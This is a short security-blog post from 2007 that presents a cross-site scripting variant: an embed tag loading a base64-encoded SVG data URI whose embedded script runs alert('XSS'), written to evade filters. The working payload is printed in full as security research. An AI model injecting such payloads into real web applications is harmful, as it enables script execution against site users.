The return of the SVG XSS - deep inside | security & tools

Subscribe to the RSS feed

Last comments

Last entries

Blog:tech

This is a simple tech blog. I am mostly interested in application security, web, technologies... but every time I can, I try to play with some other field I like such as data-mining, graph theory, compilers, languages, etc..

Contact:

Categories

Sitemap

The return of the SVG XSS

By Romain Friday, February 16 2007 - 14:11 UTC - Vulnerabilities - Permalink

Months ago, I talked about the SVG file and the possibility to include JavaScript inside. Yesterday, I read on the blog of Disenchant that this needed XML Injection: that's true.
But then, I started thinking about variants of this and an embedded SVG encoded with Base64 seems to work.

The injected string should be something like:

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="  type="image/svg+xml" 
AllowScriptAccess="always" />

Edit:
You can also find it here now XSS Cheat Sheet.